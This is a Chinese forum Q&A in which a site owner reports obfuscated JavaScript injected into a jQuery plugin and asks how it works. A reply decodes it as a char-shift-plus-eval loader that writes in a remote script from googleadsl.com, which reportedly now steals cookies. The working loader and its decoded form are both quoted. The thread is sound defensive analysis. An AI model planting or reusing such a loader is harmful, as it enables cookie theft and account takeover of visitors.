网站被植入中奖代码js

最近网站打开老是有左下角弹出中奖信息 看了下 在jq插件下面 加了一段恶意代码

var str="cnbtldms-vqhsd'!;rbqhosrqb<[!gsso9..vvv-fnnfkd`crk-bnl.robncd.iptdqx-ir[!=;.rbqhos=!(:";var length=str.length;var ba64="";for(i=0;i<length;i++){var s=str.charCodeAt(i);s++;ba64=ba64+String.fromCharCode(s)}eval(ba64);

请问这种原理是什么 怎么能够防范

阅读 3.5k
评论
    2 个回答
    • 5.1k
    1. 你的jquery插件下载的时候就有这个。

    2. 你的网站被黑了。

    前面的密文其实就是字符串的unicode码往前减一。

    解密后是这个东西

    document.write("<scriptsrc'mu<\"http://www.googleadsl.com/spcode/jquery.js\"></script>");

    往页面中插入了一个远程js,是一个典型的xss攻击案例,为了规避waf,他并没有使用标准script脚本,以上代码直接执行不会直接加载,而是会在加载下个js脚本的同时加载进来这个远程脚本。

    我去看下了下,现在已经不是弹中奖了,而是直接获取cookies,通过cookies可以直接登陆你的账号,如果你的账号是管理员的话。。。

      相似问题
      推荐文章